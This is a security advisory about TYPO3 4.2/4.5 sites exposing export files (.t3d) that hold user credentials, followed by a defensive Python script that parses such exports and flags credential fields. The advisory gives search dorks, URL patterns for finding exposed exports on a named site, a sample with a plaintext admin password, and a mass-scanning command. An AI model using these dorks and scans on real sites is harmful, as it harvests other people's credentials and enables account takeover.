Typo3 4.2 / 4.5 Information Disclosure

πŸ—“οΈΒ 14 Oct 2015Β 00:00:00Reported byΒ Cleiton PinheiroTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 50Β Views

Typo3 4.2 / 4.5 Full Information Disclosure

Code
```text
INFORMATION:

# ----------------------------------------------------------

#[+] Name: (0day) Typo3 - Full Info Disclosure
#[+] Type: Full Info Disclosure
#[+] Vendor: https://typo3.org/typo3-cms/
#[+] VULNERABLE VERSIONS: 4.2, 4.5

# ----------------------------------------------------------

#[+] AUTHOR: Cleiton Pinheiro / Nick: googleINURL
#[+] EMAIL: [email protected]
#[+] Blog: http://blog.inurl.com.br
#[+] Twitter: https://twitter.com/googleinurl
#[+] Fanpage: https://fb.com/InurlBrasil
#[+] Pastebin: http://pastebin.com/u/Googleinurl
#[+] GIT: https://github.com/googleinurl
#[+] PSS: http://packetstormsecurity.com/user/googleinurl
#[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
#[+] YOUTUBE: http://youtube.com/c/INURLBrasil
#[+] PLUS: http://google.com/+INURLBrasil
#[+] IRC: irc.pŕiv8.jp <http://irc.xn--piv8-q4a.jp> / #inurlbrasil

#[+] SEARCH DORKS:

/fileadmin/utopia ext:xml
/fileadmin/utopia*.t3d.xml
site:fr /fileadmin/utopia ext:xml
"utopia" inurl:t3d ext:xml
/fileadmin/ typo3 ext:t3d

# ----------------------------------------------------------

#[+] POC FILE .XML:

http://{server}/fileadmin/utopia{random}.t3d.xml
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml

#[+] Ex:

http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml

#[+] PRINT:
https://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png

#[+] POC FILE .T3D:

http://{server}/fileadmin/*.t3d
http://{server}/fileadmin/archives_site/*.t3d
http://{server}/subdir/fileadmin/*.t3d

#[+] Ex:

http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d

#[+] Example file contents:

s:11:"admin_xxxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1

#[+] Mass validation using SCANNER INURLBR:
# Download: https://github.com/googleinurl/SCANNER-INURLBR

#[+] COMMAND:
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a '<username>'

# Result print:
https://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png
```
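The file contents quoted above are a PHP-serialized array of exported database records, which is why a reachable export hands over usernames, e-mail addresses and password values (plaintext for the backend admin, an unsalted-looking hash for the frontend user). As an added example, not part of the advisory and not TYPO3's own code: a minimal parser for that serialization plus an audit that lists which records carry credential-like fields, so a site owner can check stray export files in fileadmin before a search engine does. It assumes the serialized section is already available as bytes (the .t3d container and the .xml variant add their own wrapping, which is not handled here) and runs on a constructed sample that mirrors the nesting quoted above.

```python
def _parse(data: bytes, pos: int):  # parse one PHP-serialized value at data[pos]; return (value, next_pos)
    t = data[pos:pos + 1]
    if t == b"N":                                    # N;
        return None, pos + 2
    if t == b"i":                                    # i:42;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if t == b"s":                                    # s:5:"hello";  (length is in bytes)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip  :"
        return data[start:start + length].decode("utf-8", "replace"), start + length + 2
    if t == b"a":                                    # a:2:{key;value;key;value;}
        colon = data.index(b":", pos + 2)
        count, pos, out = int(data[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            out[key], pos = _parse(data, pos)
        return out, pos + 1                          # skip  }
    raise ValueError(f"unsupported type {t!r} at offset {pos}")

def php_unserialize(data: bytes):
    return _parse(data, 0)[0]

SENSITIVE = {"username", "password", "email"}

def find_credential_records(node, table=None, uid=None):
    """Collect (table, uid, fields) for every record in the tree that carries credential-like fields."""
    if not isinstance(node, dict):
        return []
    present = sorted(SENSITIVE & set(node))
    if present:
        return [(table, uid, present)]
    hits = []
    for key, child in node.items():                  # string key = table name, int key = record uid
        if isinstance(key, str):
            hits += find_credential_records(child, key, None)
        else:
            hits += find_credential_records(child, table, key)
    return hits

# Constructed sample (not a real export) that mirrors the nesting quoted in the advisory.
SAMPLE_T3D = (b'a:3:{i:2;a:1:{s:8:"be_users";a:1:{i:1;a:3:{s:8:"username";s:8:"adminxxx";'
              b's:8:"password";s:10:"adminlilas";s:5:"email";s:17:"[email protected]";}}}'
              b'i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:3:{s:4:"name";s:8:"user_xxx";s:8:"username";'
              b's:7:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}'
              b'i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:1:{s:6:"level0";s:2:"72";}}}}')

if __name__ == "__main__":
    print(find_credential_records(php_unserialize(SAMPLE_T3D)))
```

Any hit means the file must not sit under a web-served path such as fileadmin; deny the .t3d and .t3d.xml extensions at the web server as well, since TYPO3 writes exports there on request.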
